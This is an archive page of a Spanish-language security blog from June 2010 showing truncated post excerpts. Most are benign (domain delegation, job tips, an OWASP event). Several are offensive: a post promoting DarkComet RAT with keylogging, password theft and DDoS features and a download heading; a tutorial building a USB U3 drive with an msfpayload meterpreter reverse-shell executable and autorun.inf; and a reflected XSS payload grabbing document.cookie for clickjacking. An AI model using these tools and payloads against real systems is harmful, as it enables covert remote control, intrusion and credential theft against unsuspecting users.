Entradas

Mostrando entradas de junio 23, 2010

Delegar un dominio .com.ar a blogger

Imagen
En el siguiente tutorial se explica como crear un dominio propio (por ejemplo tunombre.com.ar) y asociarlo con un blog que tengas en blogger. De esta manera, en vez de acceder a tunombre.blogspot.com, vas a acceder mediante tunombre.com.ar.
En lenguaje técnico esto se llama delegar un dominio y en el siguiente tutorial se explica como crear un dominio con tu nombre (tunombre.com.ar) y como delegarlo a blogger.

Temario:
1.0 - Registrar el dominio en Nic.ar
2.0 - Delegar el dominio a blogger
3.0 - Delegar los DNS a blogger

1.0 - Registrar el dominio en Nic.ar

1.1 - Registrarse como entidad
El primer paso para registrar un dominio .com.ar es registrarse como entidad, para eso vamos a http://www.nic.ar y en el panel derecho hacemos clic en Trámites vía web.Luego de hacer clic serán dirigidos a una nueva pagina, igual a esta:Vemos que hay cuatro columnas, a nosotros por el momento nos interesa solo una, la que dice Altas, y de ella solo usaremos dos botones, los dos que esta remarcados.Ahora…

DarkComet RAT 2.0 RC7

Imagen
Esta es la ultima version de la herramienta de administracion remota DarkComet creada en Delphi por el frances DarkCoderSc. El proyecto se inicio en junio del 2008 con el nombre SynRAT, y se fueron agregando funciones y mejorando la estabilidad hasta llegar a esta ultima version, la cual tambien es mucho mas estable y rapida aun al ser una version RC.



El DarkComet tiene casi todas las herramientas tipicas de estos RAT, como ser captura de pantalla, captura de camara, administrador de archivos, captura de audio, keylogger, captura contraseñas guardadas, informacion de sistema, bromas, administrar msn, etc...
Tambien posee la opcion de usar las pcs remotas como bots y realizar tareas en todas las pcs al mismo tiempo, entre ellas se destaca la posibilidad de realizar un ataque DDOS del tipo flood http.



Como dije anteriormente es una version RC o sea que todavia no esta terminada, por lo que podria tener algunos errores pequeños, aunque yo no le encontre ninguno.

Descarga:

DarkComet RAT 2.0 …

Algunas novedades del ZeuS v2.x

Imagen
En el post de hoy vamos a contar algún detalle más en el funcionamiento de las nuevas versiones 2.x de ZeuS.
Como ya se ha comentado en numerosas ocasiones, la nueva versión trae varias características diferentes: Utiliza nombres de ficheros pseudoaleatorios, frente a los nombres fijos de las versiones 1.xNo se utiliza la misma carpeta que antes, ahora se "esconde" en nombre_usuario\datos de programa\No se oculta el ficheroAlmacena la configuración en el registroPermite varias infecciones en el mismo equipoAdemás de estas, incluye otras novedades que tratan de dificultar en cierta medida el análisis del mismo.
Durante el proceso de infección, ZeuS recopila cierta información de la máquina, y esta es cifrada y almacenada en el fichero que copia en \datos de programa\. Entre estos datos se incluyen el nombre de la máquina, versión del sistema operativo, fecha de instalación del mismo, una tabla de permutaciones 00..FF generada de una manera pseudoaleatoria, el nombre y ruta del pr…

Solución para Windows XP y 2003 server afectados por vulnerabilidad de Win. Help and Support Center

Imagen
Recientemente se han publicado artículos en diversos sitios sobre la aparición de ataques explotando la vulnerabilidad descrita en el artículo de la base de datos de conocimiento KB 2219475  publicado por Microsoft el 10 de Junio pasado.

Esta vulnerabilidad afecta los componentes de Windows Help and Support Center en Windows XP y Windows Server 2003, y aunque ya se conocen ataques limitados en geografias específicas (y no se conocen aún casos en Latinoamérica) Microsoft ya publicó una solución temporal (workaround) que se puede activar a través de un botón Fix-it, disponible aqui.Al oprimir el botón Fix-it, se modificará el sistema de manera que no se pueda explotar la vulnerabilidad, mientras que Microsoft libera una actualización de seguridad que solucione de manera definitiva el problema.Aunque los sitios web que explotan esta vulnerabilidad son pocos hasta el momento (y Microsoft ha trabajado activamente con gobiernos, agencias de ley e ISPs para desactivarlos), es de esperar que …

Utilizando Cross-site Scripting para ataques de Clickjacking

Imagen
Existen una gran cantidad de aplicaciones vulnerables a Cross-Site Scripting.

Esta vulnerabilidad casi siempre se ha asociado a la posibilidad de modificar la apariencia de la aplicación y a poco más. Así pues, hoy vamos a ver como utilizar está técnica para realizar un ataque algo más complejo. El objetivo es realizar un ataque de Clickjacking, ya que hasta ahora debíamos crear una página en un dominio de nuestro poder para poder explotar este tipo de vulnerabilidad... pero ya que mediante un XSS podemos inyectar código HTML y JavaScript en otra aplicación, ¿por que no inyectarle el código necesario para realizar un ClickJacking?

El ejemplo a utilizar, es el de un XSS reflejado mediante un parámetro de búsqueda (suele ser el más común):

hxxp://www.sitio.com/search.php?text=algo"/><script>alert(document.cookie);</script> . Para empezar, vamos a ver una forma, de hacer que el servidor en el que se va a ejecutar el XSS no reciba las acciones que queremos realizar: . hxxp:…

Ataque USB U3 con MetaSploit

Imagen
En 4 simples pasos vamos a armar un USB U3, para que al ser conectado a una PC, realice una conexión reversa con meterpreter.

La idea es generar con MetaSploit un ejecutable con un payload que genere una conexión reversa al conectar el USB a la PC. Para grabar el payload dentro del U3, vamos a utilizar el programa Universal Customizer.

1. Generamos el Payload con MetaSploit

En este caso vamos a crear un ejecutable con una conexión reversa de meterpreter:
./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X > malware.exe
Por supuesto que podemos utilizar cualquier otro payload, como también encodearlo para que sea más difícil su detección.

2. Creamos nuestra ISO

Una vez que bajamos y descomprimimos Universal Customizer, copiamos malware.exe al directorio "U3CUSTOM" y creamos el archivo "autorun.inf" con el siguiente contenido:
[AutoRun] open=malware.exe
Luego ejecutamos "ISOCreate.cmd" y dentro del directorio "BIN" se va a crear nues…

Analizando un malware

Imagen
Ha pasado tiempo desde el último post, pero no me he olvidado de ustedes. Si habías seguido el último post donde hacía un megapost de análisis de malware, parece que habíamos llegado a un callejón sin salida. Mi sensación es que nos falta información y no tenemos el "ejemplar" completo.Por lo que vamos a intentarlo de nuevo con un "bicho" que me han pasado hoy.En este caso te llega un email con una foto pequeñita, en la que parece que hay chicas de fiesta. ¿Y vos qué haces? Hacés click para "ampliar la foto" (¿quién no lo haría?). El problema es que la foto en realidad es un enlace a una página web, alojada en Argentina, que te descarga un ejecutable.Este ejecutable, llamémosle "Foto28_.com", es más sospechoso que un norcoreano haciendo fotos en Almaraz.El informe de VirusTotal nos da a entender que es algún tipo de "downloader" (es decir, este "bicho" tiene la función de descargar otros "bichos") y que está empaque…

¿Buscas trabajo en seguridad informática?

Imagen
Desde Security by Defalut, un blog q leo mucho y muy a menudo, han intentado dar ciertas guías sobre cómo orientar los siguientes pasos en caso de querer dedicarte a la seguridad informática, así como qué tipo de certificaciones son más recomendables para lograr un buen puesto de trabajo. Lo que aún no han dicho es dónde y cómo buscarlo.
Antiguamente (recuerdo haberlo hecho allá por el 2003) una buena fuente de oferta laboral, incluso en seguridad informática, eran las páginas de color salmón de periódicos como El Mundo o El País. Sin embargo, los tiempos han cambiado y las tecnologías y la utilización de Internet "para todo" ha dado lugar a nuevos canales de oferta/demanda de empleo.

¿Dónde deberías buscar?
A través de contactos: Por mucha tecnología que haya, si un amigo o familiar que trabaja en una empresa que se entera que hay una posición interna abierta, lo mejor es aprovechar la oportunidad y mover el CV a través del contacto. Siempre irás recomendado y tendrás un paso …

Se viene el OWASP DAY Argentina

Imagen
OWASP Argentina junto a la Facultad de Ingeniería de la UBA organiza las primeras Jornadas de Seguridad WEB, OWASP DAY Argentina.

Estas jornadas tendrán lugar el Miércoles 30 de Junio de 13:00 a 18:30 hs, en la Facultad de Ingeniería de la UBA - Salón del Consejo, en Paseo Colon 850.

La agenda de las charlas es la siguiente:

La entrada es libre y gratuita, aunque solo hay vacantes para 100 personas.  Pueden registrarse desde aquí: eventos.fi.uba.ar/seg-informatica/
Más información sobre el OWASP DAY Argentina: www.owasp.org/index.php/OWASP_Day_Argentina_2010
Información extraída de:
http://www.kungfoosion.com/2010/06/se-viene-el-owasp-day-argentina.html

Alternativa al Copyright, licencia tus trabajos y tu música

Imagen
Todos sabemos que existe el Copyright, una licencia que nos asegura que nuestra obra quede registrada y protegida de ninguna copia por parte de terceros.Pero para licenciar nuestra música podemos usar Dig ccMixter y para nuestros trabajospodemos utilizar safe creative, y lo mejor de todo es que podemos haceerlo de manera automática.
El primer paso es descargar el software.Luego tenemos que crear una carpeta para licenciar los trabajos. Creamos la carpeta y los trabajos que queremos registrar.Añadimos la carpeta donde estarán nuestros archivos y le damos a activarComprobará el documento…Ya tenemos nuestro documento registrado
Podemos ver nuestras obras registradas en Safety CreativeInformación extraída de:http://seifreed.net/alternativa-al-copyright-licencia-tus-trabajos-y-tu-musica